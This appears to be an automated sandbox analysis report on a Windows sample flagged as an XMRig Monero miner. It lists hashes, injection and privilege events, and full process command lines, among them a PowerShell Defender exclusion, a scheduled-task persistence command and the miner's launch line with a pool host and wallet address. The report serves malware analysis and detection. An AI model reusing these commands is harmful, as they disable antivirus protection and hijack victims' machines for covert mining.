Resubmissions
06/03/2024, 22:46
240306-2pzx2abc39 723/12/2022, 20:25
221223-y7mhwahb34 1023/12/2022, 20:11
221223-yx8ncscc9x 1023/12/2022, 20:03
221223-ys7v9sha97 10Analysis
-
max time kernel
633s -
max time network
631s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
23/12/2022, 20:11
Static task
static1
Behavioral task
behavioral1
Sample
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
Resource
win7-20221111-en
General
-
Target
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
-
Size
2.1MB
-
MD5
55a350a007f6943a7e09f4abfdfa6979
-
SHA1
c94e84ddbb6f525cfa675791c7f2d9b36d28a3ef
-
SHA256
896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80
-
SHA512
707269690787a70980cfc2658592cef762503ce7228fdfa56f5d584552327d28e338cc877fb37b1414f451a9c05a05fe3e134bc0197563a266fd62ab539bdc16
-
SSDEEP
49152:yMkkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3gg+cnIFPsxdgyg:yDkfRX4UTDennUI3gvcIlRz
Malware Config
Signatures
-
XMRig Miner payload 21 IoCs
resource yara_rule behavioral1/memory/1692-111-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-113-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-115-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-116-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-118-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-120-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-121-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-123-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-125-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-126-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1692-128-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-130-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-133-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1692-136-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1104-169-0x0000000003350000-0x00000000035D6000-memory.dmp xmrig behavioral1/memory/1216-269-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/1216-273-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1216-274-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/1104-341-0x00000000031E0000-0x0000000003466000-memory.dmp xmrig behavioral1/memory/848-364-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/848-368-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1208 set thread context of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1164 set thread context of 0 1164 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe PID 1324 set thread context of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 2012 set thread context of 848 2012 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 135 PID 1800 set thread context of 0 1800 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1912 schtasks.exe 676 schtasks.exe 804 schtasks.exe 1692 schtasks.exe 820 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1424 powershell.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1104 taskmgr.exe -
Suspicious behavior: LoadsDriver 3 IoCs
pid Process 460 Process not Found 460 Process not Found 460 Process not Found -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe Token: SeDebugPrivilege 1104 taskmgr.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeLockMemoryPrivilege 1692 vbc.exe Token: SeLockMemoryPrivilege 1692 vbc.exe Token: SeDebugPrivilege 1164 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe Token: SeDebugPrivilege 860 powershell.exe Token: SeDebugPrivilege 188 powershell.exe Token: SeDebugPrivilege 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe Token: SeDebugPrivilege 1220 powershell.exe Token: SeLockMemoryPrivilege 1216 vbc.exe Token: SeLockMemoryPrivilege 1216 vbc.exe Token: SeDebugPrivilege 1732 powershell.exe Token: SeDebugPrivilege 2012 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe Token: SeDebugPrivilege 432 powershell.exe Token: SeLockMemoryPrivilege 848 vbc.exe Token: SeLockMemoryPrivilege 848 vbc.exe Token: SeDebugPrivilege 1800 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe Token: SeDebugPrivilege 2032 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1692 vbc.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe 1104 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1208 wrote to memory of 1424 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 28 PID 1208 wrote to memory of 1424 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 28 PID 1208 wrote to memory of 1424 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 28 PID 1208 wrote to memory of 792 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 31 PID 1208 wrote to memory of 792 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 31 PID 1208 wrote to memory of 792 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 31 PID 792 wrote to memory of 1692 792 cmd.exe 34 PID 792 wrote to memory of 1692 792 cmd.exe 34 PID 792 wrote to memory of 1692 792 cmd.exe 34 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1208 wrote to memory of 1692 1208 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 36 PID 1164 wrote to memory of 860 1164 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 41 PID 1164 wrote to memory of 860 1164 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 41 PID 1164 wrote to memory of 860 1164 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 41 PID 1164 wrote to memory of 1480 1164 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 43 PID 1164 wrote to memory of 1480 1164 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 43 PID 1164 wrote to memory of 1480 1164 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 43 PID 1480 wrote to memory of 820 1480 cmd.exe 45 PID 1480 wrote to memory of 820 1480 cmd.exe 45 PID 1480 wrote to memory of 820 1480 cmd.exe 45 PID 1384 wrote to memory of 188 1384 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 49 PID 1384 wrote to memory of 188 1384 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 49 PID 1384 wrote to memory of 188 1384 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 49 PID 1324 wrote to memory of 1220 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 116 PID 1324 wrote to memory of 1220 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 116 PID 1324 wrote to memory of 1220 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 116 PID 1324 wrote to memory of 1756 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 1324 wrote to memory of 1756 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 1324 wrote to memory of 1756 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 118 PID 1756 wrote to memory of 1912 1756 cmd.exe 120 PID 1756 wrote to memory of 1912 1756 cmd.exe 120 PID 1756 wrote to memory of 1912 1756 cmd.exe 120 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 1324 wrote to memory of 1216 1324 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 122 PID 852 wrote to memory of 1732 852 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 124 PID 852 wrote to memory of 1732 852 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 124 PID 852 wrote to memory of 1732 852 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 124 PID 2012 wrote to memory of 432 2012 896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe 130
Processes
-
C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:1692
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1692
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1104
-
C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:860
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1480 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:820
-
-
-
C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:188
-
-
C:\Users\Admin\Desktop\vbc.exe"C:\Users\Admin\Desktop\vbc.exe"1⤵PID:2032
-
C:\Users\Admin\Desktop\vbc.exe"C:\Users\Admin\Desktop\vbc.exe"1⤵PID:392
-
C:\Users\Admin\Desktop\vbc.exe"C:\Users\Admin\Desktop\vbc.exe"1⤵PID:612
-
C:\Users\Admin\Desktop\vbc.exe"C:\Users\Admin\Desktop\vbc.exe"1⤵PID:1064
-
C:\Users\Admin\Desktop\vbc.exe"C:\Users\Admin\Desktop\vbc.exe"1⤵PID:1596
-
C:\Users\Admin\Desktop\vbc.exe"C:\Users\Admin\Desktop\vbc.exe"1⤵PID:704
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:668
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:904
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:988
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1232
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:760
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1748
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1692
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1568
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:816
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:632
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1340
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1532
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:432
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1596
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:568
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1588
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1368
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1992
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1888
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1716
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:268
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:760
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1592
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:2020
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1372
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1500
-
C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"3⤵
- Creates scheduled task(s)
PID:1912
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1216
-
-
C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"1⤵PID:1628
-
C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2012 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious use of AdjustPrivilegeToken
PID:432
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"2⤵PID:860
-
